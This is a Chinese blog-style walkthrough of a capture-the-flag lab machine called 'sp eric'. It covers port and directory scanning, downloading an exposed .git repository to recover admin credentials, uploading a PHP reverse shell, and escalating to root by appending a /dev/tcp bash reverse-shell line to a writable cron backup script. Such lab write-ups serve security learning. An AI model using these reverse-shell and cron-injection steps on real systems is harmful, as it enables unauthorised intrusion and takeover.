sp eric靶机

扫描IP

端口扫描

nmap 192.168.111.146 -p- -sV

目录扫描

# 使用命令
dirsearch -u  "http://192.168.111.146"

访问靶机IP地址

拼接访问 admin.php ,发现登录框界面,尝试sql注入,弱口令等,没有结果

看看 .git ,使用 githack 下载源码

# 使用命令
python2 GitHack.py -u http://192.168.111.146/.git/

查看下载的源码,发现账号密码admin:st@mpch0rdt.ightiRu$glo0mappL3

# 使用命令
cd 192.168.111.146
ls
cat admin.php

尝试登录,发现登录成功

发现存在文件上传功能,kali 生成反弹 shell

# 使用命令
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

kali 开启监听

访问 /upload/php-reverse-shell.php,成功反弹 shell

提权

使用 python 提升交互性,发现没有python

看一下有没有python3

发现有 python3,那么用 python3 执行

python3 -c 'import pty;pty.spawn("/bin/bash")'

/home/eric 下发现了 backup.shbackup.zipflag.txt 这三个文件

查看 flag.txt文件内容

查看 backup.sh文件内容,可能是计划任务,看一眼

输入ls -la命令,发现backup.sh文件可写可执行

写入反弹 shell 的语句

# 使用命令
echo 'bash -i >& /dev/tcp/192.168.111.147/9999 0>&1' >> backup.sh

kali开启监听

最后在 /root 下发现一个 flag.txt

  • 15
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值